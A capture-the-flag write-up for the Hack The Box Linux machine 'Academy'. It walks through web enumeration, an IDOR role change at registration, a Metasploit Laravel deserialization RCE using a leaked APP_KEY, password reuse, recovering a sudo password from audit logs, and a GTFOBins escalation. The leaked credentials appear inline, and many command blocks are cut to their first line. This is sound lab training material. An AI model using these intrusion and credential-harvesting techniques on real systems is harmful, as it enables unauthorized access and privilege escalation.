Information
Box#
- Name: Academy
- Profile: www.hackthebox.eu
- Difficulty: Easy
- OS: Linux
- Points: 20
Write-up
Overview#
Install tools used in this WU on BlackArch Linux:
1 | $ sudo pacman -S nmap ffuf metasploit gtfoblookup |
Network enumeration#
Port and service discovery scan with nmap:
1 | # Nmap 7.91 scan initiated Tue Feb 2 18:57:09 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.10.215 |
1 | $ cat /etc/hosts | grep academy |
Let's start with the web port but let's keep in mind that we have a weird 33060 port.
Web enumeration#
We can register and login at http://academy.htb/. But there is not much to see there.
So let's enumerate with ffuf:
1 | $ ffuf -u http://academy.htb/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-small-files-lowercase.txt -fc 403 |
We notice there is an admin page.
Web exploitation: IDOR#
When registering there is a param roleid
, if we change it from zero (user) to
one (admin), we will maybe get an admin account.
1 | POST /register.php HTTP/1.1 |
Then we can login at http://academy.htb/admin.php. If you let roleid=0
you can't.
On the admin dashboard there is a todolist with a status.
Item | Status |
---|---|
Complete initial set of modules (cry0l1t3 / mrb3n) | done |
Finalize website design | done |
Test all modules | done |
Prepare launch campaign | done |
Separate student and admin roles | done |
Fix issue with dev-staging-01.academy.htb | pending |
Let's add the new subdomain to our host file.
1 | $ cat /etc/hosts | grep academy |
Web exploitation: Laravel RCE and debug mode#
Let's go at: http://dev-staging-01.academy.htb/
We are welcomed by a laravel debugger.
Here we have a bunch of environment variables leaking secrets:
1 | APP_NAME "Laravel" |
By searching for laravel api key exploit
I found this
metasploit exploit.
The RCE exploit requires the APP_KEY but we just get it through the leak.
1 | msf6 exploit(unix/http/laravel_token_unserialize_exec) > options |
Elevation of Privilege (EoP): from www-data to cry0l1t3#
First let's get a full TTY.
1 | $ python3 -c 'import pty; pty.spawn("/bin/bash")' |
There are plenty users we could target:
1 | www-data@academy:/var/www/html/htb-academy-dev-01/public$ cat /etc/passwd |
Then I ran a recursive list in the home directories: ls -lhAR /home
.
- 21y4d: empty
- ch4p: empty
- cry0l1t3: the user flag is there, and stuff about lxd (useful for EoP)
/home/cry0l1t3/.mysql_history
-> we don't have the permission
- egre55: empty
- g0blin: empty
- mrb3n: dirty stuff
/home/mrb3n/.config/composer/.htaccess
-> deny from all/home/mrb3n/.local/share/composer/.htaccess
-> deny from all
Connecting to the DB fails with mysql creds found in
/var/www/html/htb-academy-dev-01/.env
(same as the Laravel):
1 | DB_CONNECTION=mysql |
But with the ones /var/www/html/academy/.env
maybe
1 | DB_CONNECTION=mysql |
No luck either.
But I tried to reused the password mySup3rP4s5w0rd!!
with user cry0l1t3
and
it worked (remember he had a .mysql_history
in his home).
1 | $ cat user.txt |
Elevation of Privilege (EoP): from cry0l1t3 to mrb3n#
As we are in adm
group I launched a command to see what files
we have access with this group: find / -group adm -type f 2>/dev/null
.
We have access to all logs in /var/log
.
There are some interesting files but password are redacted.
1 | $ grep -ri password /var/log 2>/dev/null |
It's possible that /var/log/audit/audit.log
is logging password during auth attempts.
Ref. Logging Passwords on Linux
1 | $ grep -r 'comm="sudo"' /var/log/audit |
The password is hexadecimal encoded.
1 | $ printf %s '6D7262336E5F41634064336D79210A' | xxd -r -p |
Elevation of Privilege (EoP): from mrb3n to mrb3n#
mrb3n
is a sudoer:
1 | $ su mrb3n |
So let's check a GTFO for that one:
1 | $ gtfoblookup update |
So let's do that:
1 | $ TF=$(mktemp -d) |